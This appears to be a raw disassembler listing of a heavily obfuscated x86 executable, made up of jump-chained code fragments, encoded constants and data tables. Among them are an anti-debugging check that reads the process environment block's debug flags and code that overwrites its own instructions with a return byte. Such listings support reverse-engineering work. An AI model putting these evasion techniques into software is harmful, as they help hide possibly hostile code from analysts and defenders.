		add	eax, 700D1B98h
		mov	dword ptr [eax], 70736957h
		push	0D7F717A9h
		pop	eax
		rol	eax, 11h
		jmp	loc_456C6A
sub_4454EF	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_375. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44550E:				; CODE XREF: k2vbe3.d:0045B3DAj
		jmp	loc_443CA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_445513:				; CODE XREF: sub_45BE94-EA96j
		jmp	loc_444F98
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BCF0

loc_445518:				; CODE XREF: sub_45BCF0:loc_44E1B8j
		mov	ecx, [ecx]
		add	eax, ecx
		pop	ecx
		xor	edx, edx
		push	edx
		jmp	loc_44563B
; END OF FUNCTION CHUNK	FOR sub_45BCF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BAE4

loc_445525:				; CODE XREF: sub_44BAE4:loc_44BAEEj
		sub	eax, 39F36455h
		cmp	eax, 1DEB0706h
		jmp	loc_4450B5
; END OF FUNCTION CHUNK	FOR sub_44BAE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_445536:				; CODE XREF: sub_44A79B+8575j
		jz	loc_4573A0
		jmp	loc_444595
; END OF FUNCTION CHUNK	FOR sub_44A79B

; =============== S U B	R O U T	I N E =======================================



sub_445541	proc near		; DATA XREF: sub_442DF0+11BBCo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D1EE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043D535 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043E09C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449680 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451615 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454CDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B955 SIZE 00000018 BYTES

		push	0AFFFF7C5h
		push	eax
		call	sub_44E388

loc_44554C:				; CODE XREF: k2vbe3.d:0044FB7Ej
		jmp	loc_451615
sub_445541	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_445551:				; CODE XREF: sub_4505F8-26E7j
		jmp	nullsub_289
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------

loc_445556:				; CODE XREF: k2vbe3.d:0044D660j
		jmp	loc_43F8EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44555B:				; CODE XREF: sub_44416D+4j
					; sub_44867C+Dj ...
		jnz	loc_4504D4
		test	byte ptr [ebp-7], 8
		jz	loc_44BCC2
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_443C0D
		jmp	loc_44D409
; END OF FUNCTION CHUNK	FOR sub_44416D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_363. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44557A:				; DATA XREF: sub_448F78-112Ao
		mov	[ebp-4], eax
		jnz	loc_43D0D4
		push	0
		mov	eax, [ebp-4]
		jmp	loc_457ABE
; ---------------------------------------------------------------------------

loc_44558D:				; CODE XREF: k2vbe3.d:00447457j
		or	ebp, 14504395h

; =============== S U B	R O U T	I N E =======================================



sub_445593	proc near		; CODE XREF: sub_4468FE:loc_45367Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D437 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004526BC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456241 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004562A8 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	32AF4B20h
		pop	eax
		or	eax, ds:4000EEh
		jmp	loc_43D437
sub_445593	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_4455A8:				; CODE XREF: sub_44B2D7+CB7Dj
		add	eax, 48C10643h
		xchg	eax, [esp+0Ch+var_C]
		jmp	sub_43C04E
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FCC

loc_4455B6:				; CODE XREF: sub_448FCC:loc_440FCFj
		push	offset sub_44CDC9
		jmp	loc_459242
; END OF FUNCTION CHUNK	FOR sub_448FCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BDE4

loc_4455C0:				; CODE XREF: sub_45BDE4:loc_44BBA0j
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+4+var_4]
		mov	esp, ebp
		jmp	loc_44167B
; END OF FUNCTION CHUNK	FOR sub_45BDE4
; ---------------------------------------------------------------------------

loc_4455D2:				; CODE XREF: k2vbe3.d:0043E64Fj
		jb	sub_43E282

; =============== S U B	R O U T	I N E =======================================



sub_4455D8	proc near		; CODE XREF: k2vbe3.d:0045B17Bp

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	esi, [esp-4+arg_0]
		ror	eax, 4
		mov	ds:dword_44DA58, eax
		retn
sub_4455D8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4455E9:				; CODE XREF: sub_45AD42-1D708j
		jmp	loc_4441A0
; END OF FUNCTION CHUNK	FOR sub_45AD42

; =============== S U B	R O U T	I N E =======================================



sub_4455EE	proc near		; CODE XREF: sub_444DA9j

; FUNCTION CHUNK AT 004508F5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454F32 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_454F32
sub_4455EE	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_271. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_85. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B64A

loc_4455F6:				; CODE XREF: sub_45B64A+Aj
		jmp	nullsub_497
; END OF FUNCTION CHUNK	FOR sub_45B64A
; ---------------------------------------------------------------------------
		mov	eax, 0A5559D12h
		push	offset loc_44063F
		jmp	locret_442754
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44560A:				; CODE XREF: sub_446258-8CE6j
					; sub_440CEA:loc_44DEF4j
		call	sub_445EB0
		retn
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593D6

loc_445610:				; CODE XREF: sub_4593D6+Aj
		jmp	loc_44BC1A
; END OF FUNCTION CHUNK	FOR sub_4593D6
; ---------------------------------------------------------------------------
		db 7Fh,	64h, 7Bh
dword_445618	dd 6EFCE7h		; DATA XREF: k2vbe3.d:00445497w
					; sub_4597E6+3r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44561C:				; CODE XREF: sub_44C90E-473Dj
		jmp	loc_44FDBC
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_445621:				; CODE XREF: sub_44662B-53E3j
		jmp	loc_44CDAE
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
		dw 175Ch
dword_445628	dd 77E75CB5h		; DATA XREF: sub_449006-5D61w
					; sub_4448E9+4r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44562C:				; CODE XREF: sub_45A323+E3j
		jmp	loc_455ACA
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4537DB

loc_445631:				; CODE XREF: sub_4537DB+Aj
		jmp	sub_441409
; END OF FUNCTION CHUNK	FOR sub_4537DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_445636:				; CODE XREF: sub_4467A1+8BE9j
		jmp	loc_4485FE
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BCF0

loc_44563B:				; CODE XREF: sub_45BCF0-167D0j
		jmp	loc_449436
; END OF FUNCTION CHUNK	FOR sub_45BCF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D612

loc_445640:				; CODE XREF: sub_43D612+15j
		jmp	loc_4505FE
; END OF FUNCTION CHUNK	FOR sub_43D612
; ---------------------------------------------------------------------------
		db 0C0h, 58h, 35h
dword_445648	dd 2			; DATA XREF: k2vbe3.d:0043CAC3r
					; sub_456666-1928Er ...
		dd 3 dup(2), 0C0h, 40h,	2 dup(1), 4 dup(2), 0C0h, 40h
		dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
		dd 40h,	2 dup(1), 4 dup(2), 0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 401h, 4 dup(2), 0C0h, 40h, 0
		dd 23h dup(1), 2 dup(2), 4 dup(0)
		dd 40h,	42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
		dd 42h,	2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
		dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
		dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
		dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
		dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
		dd 0A00h, 60h, 1A00h, 4	dup(1),	0
		dd 1, 2	dup(0)
		dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
dword_445A48	dd 2			; DATA XREF: sub_456666:loc_451DC2r
		dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
		dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
		dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
		dd 3 dup(1), 2,	1C2h, 3	dup(2),	3 dup(1), 2, 1C2h, 0Bh dup(2)
		dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
		dd 1, 2, 2 dup(1), 2 dup(2), 1,	3 dup(2), 1, 2,	1, 2 dup(2)
		dd 2 dup(1), 2,	2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
		dd 1, 3	dup(2),	1, 2, 2	dup(1),	3 dup(2), 1, 3 dup(2)
		dd 1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_445E48:				; CODE XREF: sub_45A323-BAAj
		jmp	nullsub_372
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		db 68h,	16h, 0BCh
dword_445E50	dd 77EB36A5h		; DATA XREF: sub_449006+4w
					; sub_455895+9w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_445E54:				; CODE XREF: sub_44A1B1+7182j
		mov	eax, [ebp+8]

loc_445E57:				; CODE XREF: k2vbe3.d:loc_4564F5j
		cmp	dword ptr [eax-1Ch], 0F7h

loc_445E5E:				; CODE XREF: sub_44D59D:loc_452855j
					; sub_454F9F:loc_45C202j
		jnz	loc_441C00
		jmp	loc_455DF9
; ---------------------------------------------------------------------------

loc_445E69:				; CODE XREF: sub_44A1B1:loc_45131Dj
		push	offset loc_43D759
		jmp	loc_43C3A4
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D887

loc_445E73:				; CODE XREF: sub_44D887:loc_44D895j
		mov	eax, [esp+0]
		push	edx
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+8+var_8]
		jmp	loc_45B9BE
; END OF FUNCTION CHUNK	FOR sub_44D887
; ---------------------------------------------------------------------------

loc_445E82:				; CODE XREF: k2vbe3.d:00451709j
		jnz	loc_44C27C
		jmp	loc_443E12
; ---------------------------------------------------------------------------

loc_445E8D:				; DATA XREF: k2vbe3.d:004444D2o
		lea	eax, loc_44772F
		mov	byte ptr [eax],	0C3h
		jmp	loc_454A2E
; ---------------------------------------------------------------------------

loc_445E9B:				; DATA XREF: k2vbe3.d:loc_45BA12o
		call	sub_445EB0
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_445EA1:				; CODE XREF: sub_447664+10F1Bj
		jmp	loc_45858F
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45064D

loc_445EA6:				; CODE XREF: sub_45064D+16j
		jmp	loc_45B996
; END OF FUNCTION CHUNK	FOR sub_45064D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_445EAB:				; CODE XREF: sub_444966+B3CBj
		jmp	loc_451C35
; END OF FUNCTION CHUNK	FOR sub_444966

; =============== S U B	R O U T	I N E =======================================



sub_445EB0	proc near		; CODE XREF: sub_446258:loc_44560Ap
					; k2vbe3.d:loc_445E9Bp

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043DB0E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E800 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004498EB SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044E17C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455A6A SIZE 00000005 BYTES

		jno	loc_43DB0E
		push	edx
		jmp	loc_443D59
sub_445EB0	endp

; ---------------------------------------------------------------------------

loc_445EBC:				; CODE XREF: k2vbe3.d:004555E2j
		jz	loc_44A74E
		jmp	loc_45135B
; ---------------------------------------------------------------------------
		or	esi, ebx
		jnp	loc_444B82

loc_445ECF:				; CODE XREF: k2vbe3.d:loc_459643j
		xor	edx, 8C4F0427h
		or	edx, 109ED950h
		xor	edx, 163F3D53h
		add	eax, edx
		pop	edx
		ror	eax, 0Eh
		jmp	loc_44D58A
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_445EED:				; CODE XREF: sub_441409+6E4Fj
		jmp	nullsub_158
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442700

loc_445EF2:				; CODE XREF: sub_442700-3586j
		jmp	nullsub_172
; END OF FUNCTION CHUNK	FOR sub_442700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_445EF7:				; CODE XREF: sub_4426DF+57CEj
		add	eax, 997A8F59h
		xor	eax, 0EE1851A2h
		ror	eax, 9
		push	edi
		push	65F5CC0Fh
		jmp	loc_45B295
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CA

loc_445F11:				; CODE XREF: sub_4440CA:loc_4409A1j
					; sub_4440CA+FC5Dj
		push	offset sub_44091B
		jmp	loc_459830
; END OF FUNCTION CHUNK	FOR sub_4440CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_445F1B:				; CODE XREF: sub_44C90E+3F71j
		mov	ecx, eax
		jmp	loc_450CAA
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_445F22	proc near		; DATA XREF: k2vbe3.d:00442CCBo

; FUNCTION CHUNK AT 0043EE50 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004423BD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044FA0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004591B2 SIZE 00000005 BYTES

		call	sub_45B74D
		call	sub_4508A3
		or	eax, eax
		jnz	loc_44A226
		jmp	loc_44FA0D
sub_445F22	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_44421B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_445F3E:				; CODE XREF: sub_43F7AC:loc_45BF41j
		jz	loc_443ACD
		call	sub_45A252
		mov	eax, large fs:30h
		mov	eax, [eax+68h]
		test	eax, 70h
		jz	loc_43D9AF
		jmp	loc_448CBC
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_445F63:				; CODE XREF: sub_44C90E:loc_455386j
		jz	loc_4529B6
		jmp	loc_441CAD
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_445F6E	proc near		; CODE XREF: sub_4460FD-59BBj
					; k2vbe3.d:00441A6Fj ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043E2D9 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043E799 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00446FC2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044AFA6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B5FB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DD09 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045B1EE SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		movzx	eax, word ptr [eax]

loc_445F7F:				; CODE XREF: k2vbe3.d:004507B4j
		shl	eax, 2
		jmp	loc_44DD09
sub_445F6E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575DF

loc_445F87:				; CODE XREF: sub_4575DF-83A3j
		xor	ebp, 623FA8ABh

loc_445F8D:				; CODE XREF: sub_4575DF:loc_44F232j
		xor	edx, 56F0FED1h
		add	edx, 0D69A72D5h
		push	offset loc_441A44
		jmp	loc_43F2B7
; END OF FUNCTION CHUNK	FOR sub_4575DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_445FA3:				; CODE XREF: sub_442F31:loc_44C0EAj
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_44D391
; END OF FUNCTION CHUNK	FOR sub_442F31

; =============== S U B	R O U T	I N E =======================================



sub_445FB0	proc near		; CODE XREF: k2vbe3.d:0043E644p
					; k2vbe3.d:0045A243j

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		push	0BC4DEB70h
		pop	edx
		rol	edx, 4
		xor	edx, 0C4DEB60Bh
		xchg	edx, [esp-4+arg_0]
		push	0E5FDAE90h
		jmp	loc_44D209
sub_445FB0	endp


; =============== S U B	R O U T	I N E =======================================



sub_445FD0	proc near		; CODE XREF: sub_405E8A+1Bp
					; sub_405E8A+45p ...
		call	sub_445FE0
		jmp	ds:off_41E16C
sub_445FD0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_445FDB:				; CODE XREF: sub_44921C+885Bj
		jmp	nullsub_117
; END OF FUNCTION CHUNK	FOR sub_44921C

; =============== S U B	R O U T	I N E =======================================



sub_445FE0	proc near		; CODE XREF: sub_443FC1:loc_442C64j
					; sub_445FD0p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043DD5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A2A5 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451AF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452143 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045953E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BAB3 SIZE 0000000F BYTES

		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		js	loc_45BAB3
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_43DD5A
sub_445FE0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_445FF5:				; CODE XREF: sub_4534C2:loc_4497ABj
		push	1DD4F0B6h
		cdq
		jnb	loc_4442D6
		adc	eax, ebp
		xchg	ebp, [ebx]
		jmp	loc_444762
; END OF FUNCTION CHUNK	FOR sub_4534C2

; =============== S U B	R O U T	I N E =======================================



sub_44600A	proc near		; CODE XREF: k2vbe3.d:0043F937j
					; sub_458F54-BABFp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F51F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044994D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A0BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE4A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459185 SIZE 00000018 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edx, [esp-4+arg_0]
		mov	esi, edx
		jmp	loc_44A0BC
sub_44600A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_446018:				; CODE XREF: sub_44E971:loc_44B2FDj
		mov	[edi], ebx
		jmp	sub_452D37
; END OF FUNCTION CHUNK	FOR sub_44E971

; =============== S U B	R O U T	I N E =======================================



sub_44601F	proc near		; CODE XREF: sub_443F0D+FD31j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00450EEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BF4C SIZE 00000019 BYTES

		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		call	sub_442D04
		mov	eax, 0CE14EFFFh
		jmp	loc_45BF4C
sub_44601F	endp

; ---------------------------------------------------------------------------

loc_446034:				; CODE XREF: k2vbe3.d:0044CB58j
		pushf
		mov	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_446037:				; CODE XREF: sub_44498A:loc_44CB37j
		or	edi, 0B3DEFAACh
		add	edi, 4C663CA4h
		push	offset sub_448707
		jmp	nullsub_523
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------
		push	eax
		push	5320EFE4h
		pop	eax
		and	eax, 1D09100Dh
		jmp	loc_44EA26
; ---------------------------------------------------------------------------

loc_44605F:				; CODE XREF: k2vbe3.d:0044D715j
		pop	esi
		and	esi, edi

loc_446062:				; CODE XREF: k2vbe3.d:loc_452568j
		mov	eax, [ebp-0Ch]
		push	eax
		push	ebx
		jmp	loc_4484DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_44606C:				; CODE XREF: sub_444144+15061j
		jno	loc_4492E2
		add	ebp, 25FC271Eh
		mov	eax, edi
		jmp	loc_44ECDB
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44607F:				; CODE XREF: sub_43DFE1:loc_444646j
		or	eax, 7F905CD0h
		js	loc_4477C9

loc_44608B:				; CODE XREF: sub_446645+135C0j
		jmp	loc_43DCB9
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
		jnp	loc_44644A
		and	ebx, 51EC1475h
		jmp	loc_44C516
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_4460A1:				; CODE XREF: sub_43DEBE+153CEj
		jz	loc_440D0D
		jmp	loc_451B03
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------

loc_4460AC:				; CODE XREF: k2vbe3.d:00441FB4j
					; k2vbe3.d:loc_44AC18j
		call	nullsub_5
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_4460B3:				; CODE XREF: sub_45A9B3-F5FEj
		jmp	loc_43F041
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D3A

loc_4460B8:				; CODE XREF: sub_448D3A+5j
		jmp	nullsub_52
; END OF FUNCTION CHUNK	FOR sub_448D3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4460BD:				; CODE XREF: sub_457D4B-199BBj
		jmp	loc_44B7FC
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_4460C2:				; CODE XREF: sub_44DD31-10CD8j
		jmp	loc_45A9C5
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------

loc_4460C7:				; CODE XREF: k2vbe3.d:0043D11Fj
		push	ecx
		jmp	loc_453A0B
; ---------------------------------------------------------------------------

loc_4460CD:				; CODE XREF: k2vbe3.d:004558C0j
		push	8BF964DFh

loc_4460D2:				; CODE XREF: k2vbe3.d:loc_4558B8j
		xor	ebx, 0F55319C0h
		xor	eax, ebx
		pop	ebx
		call	sub_43F77F
; START	OF FUNCTION CHUNK FOR sub_449067

loc_4460E0:				; CODE XREF: sub_449067-C76Dj
		jmp	loc_4584EE
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_4460E5:				; CODE XREF: sub_44D0D5:loc_441C7Bj
		xchg	ebp, [esp+0]
		call	sub_444615
		push	84EA6E9Ah
		and	eax, 0A7D2274h
		jmp	loc_447871
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================



sub_4460FD	proc near		; CODE XREF: k2vbe3.d:0043EEAAj
					; sub_4553CC:loc_44C4E4p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043E6DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044073C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044323C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446C46 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447BF7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00448BB6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449C03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B456 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CC31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D6E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D8F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EDC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453FD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454186 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00454713 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455FD0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456D72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457ADC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004591D1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459649 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A28D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA76 SIZE 0000001D BYTES

		xchg	edi, [esp+4+var_4]
		pop	edi
		mov	edx, eax
		call	sub_45B74D
		call	sub_4508A3
		or	eax, eax
		jnz	loc_45AA76
		jmp	loc_43E6DE
sub_4460FD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44611A:				; CODE XREF: sub_457D4B+Bj
		pop	eax
		add	eax, 0DA3F10EBh
		cmp	eax, 64E0FEBBh
		jmp	loc_44D10C
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_44612C:				; CODE XREF: sub_453347-F2CAj
		push	74222474h

loc_446131:				; CODE XREF: k2vbe3.d:loc_4566D4j
		jmp	loc_45AADB
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------

loc_446136:				; CODE XREF: k2vbe3.d:00443A53j
		jz	loc_4516C0
		jmp	loc_44880D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_499. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_446142:				; CODE XREF: sub_446964+6j
		jmp	loc_4429C2
; END OF FUNCTION CHUNK	FOR sub_446964
; ---------------------------------------------------------------------------
		pop	eax
		adc	ebx, esi
		jmp	sub_451A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_44614F:				; CODE XREF: sub_44E481+BE9j
		sub	edx, 8931ABEAh

loc_446155:				; CODE XREF: sub_451CF1:loc_440358j
